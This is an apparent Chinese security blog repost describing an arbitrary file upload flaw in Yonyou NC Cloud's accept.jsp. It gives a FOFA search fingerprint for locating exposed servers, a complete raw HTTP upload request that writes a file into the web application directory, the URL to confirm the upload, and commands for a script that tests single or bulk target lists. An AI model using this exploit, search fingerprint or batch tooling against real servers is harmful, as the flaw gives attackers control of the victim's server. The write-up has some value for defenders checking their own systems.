2023年11月9日09:15:59评论73 views字数 877阅读2分55秒阅读模式

一、漏洞描述

NC Cloud是用友推出的大型企业数字化平台。用友网络科技股份有限公司NC Cloud存在任意文件上传漏洞，攻击者可利用该漏洞获取服务器控制权。

用友NC Cloud accept.jsp任意文件上传漏洞

二、网络空间搜索引擎查询

fofa查询

icon_hash="1085941792"

用友NC Cloud accept.jsp任意文件上传漏洞

三、漏洞复现

POC

POST /aim/equipmap/accept.jsp HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Length: 324Content-Type: multipart/form-data; boundary=ac1485f11aa5441defff4ab45b7fb177

--ac1485f11aa5441defff4ab45b7fb177Content-Disposition: form-data; name="upload"; filename="check.txt"Content-Type: text/plain

There is a vulnerability in this website--ac1485f11aa5441defff4ab45b7fb177Content-Disposition: form-data; name="fname"

webappsnc_webcheck.txt--ac1485f11aa5441defff4ab45b7fb177--

上传成功，返回如下：

用友NC Cloud accept.jsp任意文件上传漏洞

访问

http://ip:port/check.txt

查看上传内容

用友NC Cloud accept.jsp任意文件上传漏洞

四、漏洞检测

单个检测

python AcceptUpload.py -u url

用友NC Cloud accept.jsp任意文件上传漏洞

批量检测

python AcceptUpload.py -f filename

用友NC Cloud accept.jsp任意文件上传漏洞

原文始发于微信公众号（网络安全透视镜）：用友NC Cloud accept.jsp任意文件上传漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

用友NC Cloud accept.jsp任意文件上传漏洞

一、漏洞描述

二、网络空间搜索引擎查询

三、漏洞复现

四、漏洞检测

douphp代码执行漏洞

Apache Tomcat输入验证错误漏洞（CVE-2024-24549）

海康威视运行管理中心远程命令执行漏洞(fastjson)

大华智慧园区综合管理平台 pay 远程代码执行

开源数据大屏AJ-Report存在远程命令执行漏洞

瑞友天翼应用虚拟化系统index.php接口处存在SQL注入漏洞导致RCE

【0day】瑞友天翼应用虚拟化系统appsave存在SQL注入漏洞-复现

漏洞复现 | MetaCRM客户关系管理系统-任意文件上传漏洞【附poc】

电信网关配置管理系统存在弱口令

【漏洞复现】挂号系统-login-sql注入漏洞复现

发表评论

在线咨询

微信